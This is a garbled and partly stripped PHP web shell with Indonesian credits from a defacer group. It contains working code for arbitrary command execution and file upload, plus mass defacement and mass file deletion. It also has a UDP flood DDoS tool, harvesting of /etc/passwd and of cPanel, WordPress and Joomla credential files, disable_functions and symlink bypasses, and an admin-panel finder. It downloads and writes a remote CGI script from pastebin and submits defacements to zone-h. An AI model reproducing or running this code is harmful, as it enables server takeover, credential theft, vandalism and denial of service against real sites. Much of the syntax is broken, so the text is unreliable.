" . } else { return "" . } } function r if return "" . } else { return "" . } } function exe if @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return } } function perms $perms = fileperms($file); if // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return } function hdd if return sprintf elseif return sprintf elseif return sprintf else return } function ambilKata if if $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return } function getsource $curl = curl_init($url); curl_setopt curl_setopt curl_setopt curl_setopt $content = curl_exec($curl); curl_close return } function bing $npage = 1; $npages = 30000; $allLinks = array(); $lll = array(); while $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); if preg_match_all foreach $npage = $npage + 10; if } else break; } $URLs = array(); foreach $exp = explode("/", $url); $URLs[] = $exp[2]; } $array = array_filter($URLs); $array = array_unique($array); $sss = count(array_unique($array)); foreach echo } } function reverse $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt curl_setopt curl_setopt curl_setopt $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("""","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset foreach $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo ob_flush flush } curl_close } if function idx_ss return is_array } $_POST = idx_ss($_POST); $_COOKIE = idx_ss($_COOKIE); } if $dir = $_GET['dir']; chdir } else { $dir = getcwd(); } $kernel = php_uname(); $ip = gethostbyname($_SERVER['HTTP_HOST']); $dir = str_replace("","/",$dir); $scdir = explode("/", $dir); $freespace = hdd(disk_free_space("/")); $total = hdd(disk_total_space("/")); $used = $total - $freespace; $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $perl = (exe('perl --help')) ? "ON" : "OFF"; $python = (exe('python --help')) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; if $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } echo "System: " . echo "User: " . echo "Server IP: " . echo "HDD: $used / $total ( Free: $freespace )
" echo "Safe Mode: $sm
" echo "Disable Functions: $show_ds
" echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
" echo "Current DIR: " foreach echo "$cdir/" } echo "  [ " .w echo echo "
" echo "" echo "
" echo "" if unset echo "" } elseif($_GET['do'] == 'upload') { echo "
" if if if $act = "Uploaded! at $dir/".$_FILES['ix_file']['name'].""; } else { $act = "failed to upload file"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if if $act = "Uploaded! at $root -> $web"; } else { $act = "failed to upload file"; } } else { $act = "failed to upload file"; } } } echo
Biasa [ ".w($dir,"Writeable")." ] home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]
"; echo echo "
" } elseif($_GET['do'] == 'bypass') { ?>
Fungsi ini sebagai bypass symlink(internal server Error)
$korban
" echo "Done .htaccess
" $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw"; $post1 = array( "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array( "upload[]" => "@$global",); $output_mkfile = ngirim("$korban", $post1); $upload_ah = ngirim("$korban?cmd=upload", $post2); } } ?>
Fungsi ini sebagai bypass Disable Functions(Mod Security )
$korban
" echo "Done php.ini
" $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw"; $post1 = array( "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array( "upload[]" => "@$global",); $output_mkfile = ngirim("$korban", $post1); $upload_ah = ngirim("$korban?cmd=upload", $post2); } } ?>
Fungsi ini sebagai bypass Disable Functions(Mod Security )
$korban
" echo "Done .htaccess1
" $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw"; $post1 = array( "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array( "upload[]" => "@$global",); $output_mkfile = ngirim("$korban", $post1); $upload_ah = ngirim("$korban?cmd=upload", $post2); } } ?>


Klik Ini" } ?>






 

Global Network


Virtual Hosting


" . echo "

'c 9 9', 'abcr57' => 'r 5 7'); $sis=0; if $size=filesize($file); $last=date("M-d-Y H:i", $last_modified); foreach if $sis=1; $i++; ?>
No T y p e F i l e  L o c a t i o n L a s t  E d i t F i l e  S i z e
GMT+9 byte
GMT+9 byte
GMT+9 byte
GMT+9 byte
not exist no record -    byte
 








Belajar mengalah sampai tak satupun yang dapat mengalahkan.
Keep Play With you game and keep Fun :D
tidak ada orang bodoh atau orang jago yang ada hanya kata males.
Jiwa Seorang defacer tetaplah sama :D
12-20-2016 - Tangerang

Tanks to:

=[ Teman-Temanku ]=

Gabby
Antonio HSH
R10
w4r0x
edelle007
Brian kamikaze
Clover Lepex
Uyap Madan Cyber Coretan Rizal Indonesia Fighter Cyber B-Compi
Jasakom
Mojopahit Fighter Cyber
Lappis
Mojopahit Cyber Dark
Crack Hack Forum
dan semua grup hacking
yang
saya naungi dan singgahi


By
Cyber173 a.k.a X'1n73ct


CSRF EXPLOITER ONLINE




*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
URL :
POST File



Crot " . $adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin", "loginadmin3/", "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "operator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellogin/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php", "admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", "author/login.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php","home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp", "memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel"); foreach $headers = get_headers("$url$admin"); if echo "$url$admin Nemu nih!
" } else echo "$url$admin Gk ketemu!
" } } } } elseif($_GET['do'] == 'cmd') { echo ".$user."@".$ip.": ~ $ "; if echo "
" .exe
}
} elseif($_GET['do'] == 'mass_deface') {
function sabun_massal
if
$dira = scandir($dir);
foreach
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if
file_put_contents
} elseif($dirb === '..') {
file_put_contents
} else {
if
if
echo "[DONE] $lokasi
" file_put_contents $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa if $dira = scandir($dir); foreach $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if file_put_contents } elseif($dirb === '..') { file_put_contents } else { if if echo "[DONE] $dirb/$namafile
" file_put_contents } } } } } } if if echo "
" sabun_massal echo "
" } elseif($_POST['tipe_sabun'] == 'murah') { echo "
" sabun_biasa echo "
" } } else { echo "
" echo Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

"; } } elseif($_GET['do'] == 'ddos') { ?>



Your IP
Ddos Tool
IP Target:
Time:
Port:



Seteleh selesai menggunakan tools ini segera refresh browsingmu

" $max_time = $time + $exec_time; for $out.= "X"; } while $packets++; if break } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if fwrite fclose } } echo "Packet complete at " . "; } } elseif($_GET['do'] == 'mass_delete') { function hapus_massal if $dira = scandir($dir); foreach $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if if unlink } } elseif($dirb === '..') { if unlink } } else { if if if echo "[DELETED] $lokasi
" unlink $idx = hapus_massal($dirc,$namafile); } } } } } } } if echo "
" hapus_massal echo "
" } else { echo "
" echo Folder:

Filename:

"; } } elseif($_GET['do'] == 'config') { $etc = fopen("/etc/passwd", "r") or die("
Can't read /etc/passwd
"); $idx = mkdir("idx_config", 0777); $isi_htc = "Options all Require None Satisfy Any"; $htc = fopen("idx_config/.htaccess","w"); fwrite while if echo "Can't read /etc/passwd" } else { preg_match_all foreach $user_config_dir = "/home/$user_idx/public_html/"; if $grab_config = array( "/home/$user_idx/.my.cnf" => "cpanel", "/home/$user_idx/.accesshash" => "WHM-accesshash", "/home/$user_idx/public_html/po-content/config.php" => "Popoji", "/home/$user_idx/public_html/vdo_config.php" => "Voodoo", "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_idx/public_html/forum/config.php" => "phpBB", "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal", "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_idx/public_html/app/etc/local.xml" => "Magento", "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla", "/home/$user_idx/public_html/configuration.php" => "Joomla", "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wp-config.php" => "WordPress", "/home/$user_idx/public_html/admin/config.php" => "OpenCart", "/home/$user_idx/public_html/slconfig.php" => "Sitelok", "/home/$user_idx/public_html/application/config/database.php" => "Ellislab"); foreach $ambil_config = file_get_contents($config); if } else { $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w"); fputs } } } } } } echo "
Done
" } elseif($_GET['do'] == 'jumping') { $i = 0; echo "
" if $urls = explode(" ", $_POST['url']); if echo "
"
foreach
$url = str_replace(array("http://","www."), "", strtolower($url));
$etc = "/etc/passwd";
$f = fopen($etc,"r");
while
$pecah = explode(":", $gets);
$user = $pecah[0];
$dir_user = "/hsphere/local/home/$user";
if
$url_user = $dir_user."/".$url;
if
$i++;
$jrw = "[R] $url_user";
if
$jrw = "[RW] $url_user";
}
echo
}
}
}
}
if
} else {
echo "
Total ada " . } echo "
" } else { echo
List Domains

NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } }elseif($_GET['do'] == 'defacerid') { echo Defacer:

Team:

Domains:

"; $site = explode(" ", $_POST['sites']); $go = $_POST['go']; $hekel = $_POST['hekel']; $tim = $_POST['tim']; if foreach $zh = $sites; $form_url = "https://www.defacer.id/notify"; $data_to_post = array(); $data_to_post['attacker'] = "$hekel"; $data_to_post['team'] = "$tim"; $data_to_post['poc'] = 'SQL Injection'; $data_to_post['url'] = "$zh"; $curl = curl_init(); curl_setopt curl_setopt curl_setopt ($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm) curl_setopt curl_setopt curl_setopt ($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html'); $result = curl_exec($curl); echo curl_close echo "
" } } } elseif($_GET['do'] == 'zoneh') { if $domain = explode(" ", $_POST['url']); $nick = $_POST['nick']; echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
" ; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

" ; function zoneh $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt curl_setopt curl_setopt return curl_exec curl_close } foreach $zoneh = zoneh($url,$nick); if echo "$url -> OK
" } else { echo "$url -> ERROR
" } } } else { echo Defacer:

Domains:

"; } echo "
" } elseif($_GET['do'] == 'cgi') { $cgi_dir = mkdir('idx_cgi', 0755); $file_cgi = "idx_cgi/cgi.izo"; $isi_htcgi = "AddHandler cgi-script .izo"; $htcgi = fopen(".htaccess", "w"); $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg"); $cgi = fopen($file_cgi, "w"); fwrite fwrite chmod echo "" } elseif($_GET['do'] == 'fake_root') { ob_start $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if $site = explode(" ", $_POST['url']); $file = $_POST['file']; foreach $cek = getsource("$url/~$user/$file"); if echo "URL: $url/~$user/$file -> Fake Root!
" } } } else { echo Filename user Domain
"; } elseif($_GET['act'] == 'rename') { if $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename']).""); if $act = ""; } else { $act = "permission denied"; } echo "" . } echo "Filename: " .basename echo "; } elseif($_GET['act'] == 'delete') { $delete = unlink($_GET['file']); if $act = ""; } else { $act = "permission denied"; } echo } else { if if echo "can't open directory. ( not readable )" } else { echo
Name
Type
Size
Last Modified
Owner/Group
Permission
Action
'; $scandir = scandir($dir); foreach $dtype = filetype("$dir/$dirx"); $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx")); if $downer = @posix_getpwuid(fileowner("$dir/$dirx")); $downer = $downer['name']; } else { //$downer = $uid; $downer = fileowner("$dir/$dirx"); } if $dgrp = @posix_getgrgid(filegroup("$dir/$dirx")); $dgrp = $dgrp['name']; } else { $dgrp = filegroup("$dir/$dirx"); } if if $href = "$dirx"; } elseif($dirx === '.') { $href = "$dirx"; } else { $href = "$dirx"; } if $act_dir = "newfile | newfolder"; } else { $act_dir = "rename | delete"; } echo "" echo "$href"; echo "
$dtype
" echo "
-
" echo "
$dtime
" echo "
$downer/$dgrp
" echo "
" .w echo "$act_dir" echo "" } } } else { echo "can't open directory." } foreach $ftype = filetype("$dir/$file"); $ftime = date("F d Y g:i:s", filemtime("$dir/$file")); $size = filesize("$dir/$file")/1024; $size = round($size,3); if $fowner = @posix_getpwuid(fileowner("$dir/$file")); $fowner = $fowner['name']; } else { //$downer = $uid; $fowner = fileowner("$dir/$file"); } if $fgrp = @posix_getgrgid(filegroup("$dir/$file")); $fgrp = $fgrp['name']; } else { $fgrp = filegroup("$dir/$file"); } if $size = round($size/1024,2). 'MB'; } else { $size = $size. 'KB'; } if echo "" echo "$file" ; echo "
$ftype
" echo "
$size
" echo "
$ftime
" echo "
$fowner/$fgrp
" echo "
" .w echo "edit | rename | delete | download" echo "" } echo "" if // } else { echo "
" } echo "
Copyright © " .date ("Y")." - Global Network
"; } ?>